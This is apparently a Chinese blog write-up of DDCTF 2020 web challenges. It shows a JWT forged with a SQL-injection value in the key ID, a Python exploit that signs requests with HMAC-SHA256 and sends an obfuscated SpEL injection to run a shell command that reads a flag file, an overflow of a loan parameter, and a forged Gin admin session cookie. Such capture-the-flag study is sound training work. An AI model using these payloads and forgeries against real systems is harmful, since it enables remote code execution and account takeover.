DDCTF | iluem'Blog

DDCTF

发布 : 2020-09-07 分类 : Web 浏览 :

DDCTF

Web签到

image-20200904120213082

jwt伪造

username=1&pwd=1&token=eyJhbGciOiJIUzI1NiIsImtpZCI6IjAgdW5pb24gc2VsZWN0IDEiLCJ0eXAiOiJKV1QifQ.eyJ1c2VyTmFtZSI6IjEiLCJwd2QiOiIxIiwidXNlclJvbGUiOiJBRE1JTiIsImV4cCI6MTU5OTI3ODA1OH0.6DlTlDJm7AYu6KnvDsXgWAOfuAyKyemIKYT6UOh1AF4

得到

{"code":0,"message":"success","data":"client dowload url: http://117.51.136.197/B5Itb8dFDaSFWZZo/client"}

下载client,是一个可执行文件

运行效果如下

image-20200906131039394

flag在/home/dc2-user/flag/flag.txt

signature格式是command|timestamp

交给iyzyi师傅分析,说是sha256+base64签名的,还有个DDCTFWithYou不知道干嘛用的,直接sha256+base64不对,最终找到是HMAC-SHA256,搜索sha256+base64签名可以搜到相关内容

https://cloud.tencent.com/document/product/228/10771

然后一测试果然对了

后边是一个spel模板注入

参考K0rz3n的一篇文章

放上最终exp

import hmac
import base64
import time
from hashlib import sha256
import requests
import json
t=str(int(time.time()))
command='''T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())'''
#/home/dc2-user/flag/flag.txt           
tmp=command+"|"+t
appsecret = b"DDCTFWithYou" #  秘钥
data = bytes(tmp,encoding='utf-8') #  加密数据
signature= base64.b64encode(hmac.new(appsecret, data, digestmod=sha256).digest())
signature=str(signature,encoding='utf-8')
datas=json.dumps({"signature":signature,"command":command,"timestamp":t})
url='http://117.51.136.197/server/command'
r=requests.post(url,data=datas)
print(r.text)

卡片商店

image-20200906133628759

提示说100张卡能兑换礼物,但是截止时间只有两三分钟的样子。靠它本身给的游戏规则自然是不能在这时间内拿到100张卡。

但是借一个很大的数似乎会溢出loans?loans=9999999999999,然后我们就有足够的钱去卖

image-20200906134014973

点击兑换后

image-20200906134048180

提示 : “恭喜你,买到了礼物,里面有夹心饼干、杜松子酒和一张小纸条,纸条上面写着:url: /flag , SecKey: Udc13VD5adM_c10nPxFu@v12,你能看懂它的含义吗?”

image-20200906134216934

其中杜松子酒是gin的意思,在这里是指go的gin框架。然后接下来拿出凡哥iv4n写的工具一键修改session。

root@kali:~# ./faker dec -c "MTU5OTM3MTA2MXxEdi1CQkFFQ180SUFBUkFCRUFBQV81cl9nZ0FDQm5OMGNtbHVad3dJQUFaM1lXeHNaWFFHYzNSeWFXNW5ER01BWVhzaWIzZHBibWR6SWpwYlhTd2lhVzUyWlhOMGN5STZXMTBzSW0xdmJtVjVJam81T1RrNU9UazRNVEkxTURnd016Z3pMQ0p1YjNkZmRHbHRaU0k2TVRVNU9UTTNNRGszTlN3aWMzUmhjblJmZEdsdFpTSTZNVFU1T1RNM01EYzVOWDBHYzNSeWFXNW5EQWNBQldGa2JXbHVCR0p2YjJ3Q0FnQUF8syX_1eT-vi_9JYZ5XR8hbomW0lRg7HQ-f896e1YlNQk=" 
map[admin:false wallet:{"owings":[],"invests":[],"money":9999998125080383,"now_time":1599370975,"start_time":1599370795}]
type detail: 
{
    admin[string]: false[bool],
    wallet[string]: {"owings":[],"invests":[],"money":9999998125080383,"now_time":1599370975,"start_time":1599370795}[string],
}

设置一个admin的session

root@kali:~# ./faker enc -n "session" -k "Udc13VD5adM_c10nPxFu@v12" -o "{admin: true[bool]}"
MTU5OTM3MTgzMXxFXy1CQkFFQkEwOWlhZ0hfZ2dBQkVBRVFBQUFkXzRJQUFRWnpkSEpwYm1jTUJ3QUZZV1J0YVc0RVltOXZiQUlDQUFFPXzYYKFyR_6b58VGMVEMyyo4S4AwUcXMEVAiF1VqOCXQvw==

即可拿到flag

image-20200906135738628

留下足迹